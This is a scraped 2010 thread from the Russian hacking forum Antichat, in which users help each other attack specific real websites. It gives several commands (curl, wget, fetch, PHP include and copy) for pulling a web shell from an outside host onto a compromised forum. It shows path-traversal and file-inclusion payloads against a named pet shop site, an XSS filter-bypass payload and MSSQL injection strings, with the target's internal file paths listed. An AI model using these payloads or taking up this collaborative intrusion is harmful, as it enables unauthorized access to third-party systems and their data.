Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.04.2010, 18:28
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от GroM88
Такой вопрос,
как залить шелл = \
vb 4.0.2
Есть доступ к админке, добавил модуль в faq_complete с содержимым
OC там Linux
Пишу в адресной строке:
http://forum.site.ru/faq.php?cmd=ls
Вижу файлы и папки корня)
Делаю такой запрос в адресной строке:
forum.site.ru/faq.php?cmd=wget www.sitesshelom.ru/shell.php
Долго думает ) и потом вылазит 404 not found, вообщем шелл не заливается = \
подскажите как залить еще можно = \
curl --output /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
fetch -o /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
wget -o /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
get www.sitesshelom.ru/shell.php > /kuda/zalivaem/shell.php
если allow_url_include On - include("http://www.sitesshelom.ru/shell.php");
copy('http://www.sitesshelom.ru/shell.php','/kuda/zalivaem/shell.php');
|
|
|
27.04.2010, 21:02
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php on line 408
|
|
|
|
27.04.2010, 21:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от DrakonHaSh
можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php on line 408
если бы опция magic quotes не была включена, то
PHP код:
http://www.petshopdamigos.gr/index.php?action=/../../../../../../../c:boot.ini%00
|
|
|
|
27.04.2010, 21:15
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Код:
http://www.petshopdamigos.gr/index.php?action=/../../index.php.........................................................................................................................................................................................
|
|
|
|
27.04.2010, 21:22
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от попугай
если бы опция magic quotes не была включена, то
PHP код:
http://www.petshopdamigos.gr/index.php?action=/../../../../../../../c:boot.ini%00
а не можно заxeксить?
|
|
|
|
27.04.2010, 21:22
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Konqi
а не можно заxeксить?
выше способ дали рабочий
|
|
|
|
27.04.2010, 22:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от DrakonHaSh
можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php on line 408
кстати в поле поиска пасивка.
чтоб обойти mg юзаем асции
<script>alert(String.fromCharCode(88,83,83))</script>
ps http://forum.xakep.ru/m_1298634/tm.htm - понрвилось
Последний раз редактировалось Strilo4ka; 27.04.2010 в 22:59..
|
|
|
|
27.04.2010, 23:03
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
попугай, wildshaman, Strilo4ka спасибо за помощь и советы
копаю дальше
http://www.petshopdamigos.gr/index.php?action=/../../../../../../inetpub/vhosts/petshopdamigos.gr/httpdocs/admin/info - phpinfo()
есть
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \index.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \info.php
но текст их посмотреть нельзя, только исполнение через require()
http://www.petshopdamigos.gr/test - basic авторизация, ни .htaccess ни .htpasswd там нет, да и сервер там Microsoft-IIS/6.0
доступ к соседям закрыт - Permission denied
sql inj вроде как нигде нет
через http://www.petshopdamigos.gr/index.php?action=05 можно попасть на форму, которая через mail() будет слать письмо
http://www.petshopdamigos.gr/index.php?action=09 ссылок на которую ниоткуда нет выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \action_09.php on line 9
есть идеи с какой стороны еще можно залезть ?
Последний раз редактировалось DrakonHaSh; 27.04.2010 в 23:45..
|
|
|
|
27.04.2010, 23:46
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
в чем может быть проблема?
зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATI ON_SCHEMA.COLUMNS)--
|
|
|
|
27.04.2010, 23:58
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char
или фильтр на INFORMATIO N_SCHEMA.TABLES - тоже обходится, но как не помню, пусть более просвещенные подскажут 
Последний раз редактировалось DrakonHaSh; 28.04.2010 в 00:01..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
